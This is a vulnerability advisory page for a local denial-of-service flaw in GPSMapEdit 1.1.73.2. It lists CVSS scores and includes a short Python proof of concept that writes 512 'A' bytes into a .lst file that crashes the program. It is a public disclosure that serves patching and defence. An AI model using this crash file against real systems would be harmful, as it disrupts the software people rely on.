GPSMapEdit 1.1.73.2 Denial Of Service

2012-01-10 / 2012-11-27
Credit: Julien Ahrens
Risk: Low
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

#!/usr/bin/python # Exploit Title: GPSMapEdit v1.1.73.2 (.lst) Local Denial of Service Vulnerability # Version: 1.1.73.2 # Date: 2012-01-08 # Author: Julien Ahrens # Homepage: www.inshell.net # Software Link: http://www.geopainting.com # Tested on: Windows XP SP3 Professional German / Windows 7 Professional 64bit German file="GPSMapEdit_crash.lst" junk="\x41"*512 print "[*] Creating crash file...\n"; writeFile = open (file, "w") writeFile.write(junk) writeFile.close() print "[*] File successfully created!\n\n";

References:

http://www.geopainting.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top